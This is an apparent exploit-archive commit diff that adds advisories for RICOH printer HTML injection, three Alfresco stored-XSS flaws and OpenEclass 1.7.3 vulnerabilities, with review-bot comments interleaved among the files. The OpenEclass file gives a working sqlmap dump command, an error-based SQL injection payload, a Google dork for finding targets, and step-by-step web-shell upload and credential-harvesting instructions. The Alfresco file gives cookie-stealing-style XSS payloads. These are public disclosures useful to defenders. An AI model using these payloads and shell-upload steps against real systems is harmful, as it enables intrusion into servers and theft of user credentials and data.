DB: 2020-03-04
4 changes to exploits/shellcodes RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Alfresco 5.2.4 - Persistent Cross-Site Scripting GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
This commit is contained in:
parent
afe5797b88
commit
d85ad29bbc
5 changed files with 345 additions and 0 deletions
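--- a/exploits/hardware/webapps/48161.txt
+++ b/exploits/hardware/webapps/48161.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
+# Discovery by: Paulina Girón
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
+# Product Version: RICOH Aficio SP 5200S Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 447
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:15:59 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:15:59 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 611
+Cache-Control: max-age=0
+Origin: http://xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9
+Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
+Connection: close
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+Date: Mon, 02 Mar 2020 15:17:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 15:17:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close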
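Review bot: The write-up never records the injection the title claims: the `adrsSetUser.cgi` body submits the benign value `entryNameIn=prueba`, the captured responses are headers only, and no line says which page renders the stored entry name without escaping or how that was observed. Both requests carry `risessionid` and `wimsesid` cookies, so an authenticated session appears to be a prerequisite; the header block should state that explicitly, e.g. `# Prerequisites: authenticated address-book session`. A one-line description of the affected view (presumably the address list at `adrsList.cgi`, given the Referer on the first request) would let an administrator triage the report without re-running it. The same gaps apply to exploits/hardware/webapps/48164.txt, whose body uses `entryNameIn=test`.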
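--- a/exploits/hardware/webapps/48164.txt
+++ b/exploits/hardware/webapps/48164.txt
@@ -0,0 +1,73 @@
+# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
+# Discovery by: Olga Villagran
+# Discovery Date: 2020-03-02
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
+# Product Version: RICOH Aficio SP 5210SF Printer
+# Vulnerability Type: Code Injection - HTML Injection
+
+# Steps to Produce the HTML Injection:
+
+#1.- HTTP POST Request 'adrsGetUser.cgi':
+
+POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 402
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:22:44 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:22:44 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+
+#2.- HTTP POST Request 'adrsSetUser.cgi':
+
+
+POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 607
+Connection: close
+Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
+Upgrade-Insecure-Requests: 1
+
+mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
+
+
+#HTTP Response :
+
+HTTP/1.0 200 OK
+
+Date: Mon, 02 Mar 2020 22:23:10 GMT
+Server: Web-Server/3.0
+Content-Type: text/html; charset=UTF-8
+Expires: Mon, 02 Mar 2020 22:23:10 GMT
+Pragma: no-cache
+Cache-Control: no-cache
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close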
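--- a/exploits/php/webapps/48162.txt
+++ b/exploits/php/webapps/48162.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
+# Date: 2020-03-02
+# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://www.alfresco.com/
+# Software Link: https://www.alfresco.com/ecm-software
+# Version: Alfresco before 5.2.4
+# Tested on: 5.2.4
+# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
+# Security advisory: https://gitlab.com/snippets/1937042
+
+
+### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
+
+Each file has a set of properties than can be edited by any authenticated user
+that have write access on the project or the file.
+
+The **URL** property of the file provided by the user is injected in the `href`
+attribute of the HTML link without a proper escaping.
+
+- Where? In URL property
+- Payload: `" onmouseover="alert(document.cookie)"`
+- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
+```html
+<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
+```
+- Privileges: It requires write privileges to store it, any user with read access can see it.
+- Steps to reproduce:
+1. Go to _Document Library_
+2. Upload a file or click _Edit properties_ on an existing file
+3. Enter the payload in the URL property
+4. Click on the file title to go on the detailed page of the file
+5. Hover the displayed link to trigger the XSS
+
+### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
+
+There is no file restriction for photo uploading in the user profile page.
+Then the profile picture can be seen in the browser.
+
+- Where? In user profile photo
+- Payload:
+```xml
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
+<script type="text/javascript">
+alert('XSS - Orange Cyberdefense');
+</script>
+</svg>
+```
+- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
+- Privileges: Any authenticated user can store it or trigger it.
+- Steps to reproduce:
+1. Go to your user profile page (`/share/page/user/<username>/profile`)
+2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
+3. Use the document browser or any dashboard to find the uploaded file
+4. Click on the title to go to the detailed page of the file
+5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
+
+### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
+
+This is the generic version of the previous XSS. Uploading dangerous file types
+is allowed and then they can be viewed to triggered the XSS. The difference
+between the two is that this one requires right access on a project to upload
+documents so the XSS is not exploitable with a read only account but the
+previous one can be exploited by any user as any user is allowed to have a
+profile photo.
+
+- Where? Uploading a document anywhere
+- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
+- Details: The XSS is triggerred only with the _View in browser_ feature.
+- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
+- Steps to reproduce:
+1. Go to a project dashboard
+2. IClick _Upload_ and upload a dangerous file
+3. Use the document browser or any dashboard to find the uploaded file
+4. Click on the title to go to the detailed page of the file
+5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)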
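Review bot: The version metadata contradicts itself: `# Version: Alfresco before 5.2.4` says 5.2.4 is outside the affected range, while the title and `# Tested on: 5.2.4` say that exact release was confirmed vulnerable, so a reader cannot tell whether 5.2.4 is affected or is the fix. Suggest `# Version: 5.2.4 and earlier` (or whatever range the linked advisory states) so the header, the title and the CSV entry agree. In XSS n°3, "requires right access on a project" reads as "write access" given the Privileges line two paragraphs later, and "IClick" in step 2 is a typo. For administrators, the shared root cause of n°2 and n°3 is the _View in browser_ feature serving user uploads inline from the application origin; a sentence noting that serving uploads with `Content-Disposition: attachment` or from a separate origin is the standard mitigation would make the write-up more useful to defenders.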
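--- a/exploits/php/webapps/48163.txt
+++ b/exploits/php/webapps/48163.txt
@@ -0,0 +1,116 @@
+# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
+# Google Dork: intext:"© GUnet 2003-2007"
+# Date: 2020-03-02
+# Exploit Author: emaragkos
+# Vendor Homepage: https://www.openeclass.org/
+# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+# Version: 1.7.3 (2007)
+# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
+# CVE : -
+
+Older versions are also vulnerable.
+
+Source code:
+http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
+http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+
+Setup instructions:
+http://download.openeclass.org/files/docs/1.7/Install.pdf
+
+Changelog:
+https://download.openeclass.org/files/docs/1.7/CHANGES.txt
+
+Manual:
+https://download.openeclass.org/files/docs/1.7/eClass.pdf
+
+############################################################################
+
+Unauthenticated Information Disclosure
+
+System info
+127.0.0.1/modules/admin/sysinfo
+(powered by phpSysInfo 2.0 that is also vulnerable)
+
+Web-App version info
+127.0.0.1/README.txt
+127.0.0.1/info/about.php
+127.0.0.1/upgrade/CHANGES.txt
+
+############################################################################
+
+(Authenticated - Requires student account) - Error-Based SQLi
+
+https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
+
+sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
+
+---
+Parameter: month (GET)
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
+---
+
+Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
+If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
+If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
+It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
+https://www.exploit-db.com/exploits/48106
+
+############################################################################
+
+(Authenticated - Requires student account) - PHP upload file extension bypass
+If you have a student account you can bypass file extension restrictions and upload a PHP shell.
+Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
+Start looking for a class that you can submit an exercise as a student.
+Register in that class and navigate to submit you exercise.
+If you try to upload a .php file it will be renamed to .phps to prevent execution.
+You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
+Once you have uploaded it, open your course directory and then add "work" directory at the end
+Course link example: https://127.0.0.1/courses/CS101/
+Course link becomes: https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view the directories.
+Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
+Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
+
+The same method works with "groups" if you cant find a class that supports submitting an exercise.
+https://127.0.0.1/modules/group/group.php
+
+############################################################################
+
+(Authenticated - Requires student account) - View assessments of other students
+If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
+Find the course link you are interested in.
+https://127.0.0.1/courses/CS101
+Add "work" directory at the end
+https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
+
+############################################################################
+
+(Authenticated - Requires admin account) - Upload PHP files
+
+You have to login to the platform as an administrator or user with admin rights.
+You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
+following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
+Once you have logged in as admin:
+1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
+2) Upload your .php shell compressed in a .zip file
+3) Ignore the error message
+4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
+
+############################################################################
+
+(Authenticated - Requires admin account) - phpMyAdmin Remote Access
+
+127.0.0.1/modules/admin/mysql
+phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
+Once you have uploaded your shell can view the config.php file that contains the mysql password
+127.0.0.1/config/config.php
+
+############################################################################
+
+(Authenticated - Requires admin account) - Plaintext password storage
+
+When logged in as admin you can view all registered users credentials as plaintext.
+127.0.0.1/modules/admin/listusers.php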
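Review bot: The title and the CSV row describe only the `month` SQL injection, yet the body documents six further issue classes (unauthenticated information disclosure, upload extension bypass, directory listing of student submissions, admin zip upload, default phpMyAdmin exposure, plaintext credential storage) with no per-issue header or identifier, so anyone indexing the advisory by title will miss most of it. Suggest a summary line after `# CVE : -`, e.g. `# Also documented: info disclosure, upload extension bypass, directory listing, admin file upload, default phpMyAdmin, plaintext passwords`, and keeping the sqlmap output as the only evidence for the titled finding. The sentence "Almost every parameter will be either error-based, boolean-based or time-based vulnerable" is not supported by any output in the file and should be hedged or backed by a second captured parameter. The path `127.0.0.1/cources/tmpUnzipping/` uses a different prefix from the `/courses/` paths elsewhere; if that is a typo rather than the real directory name, it should be corrected so defenders checking for residue look in the right place.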
@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,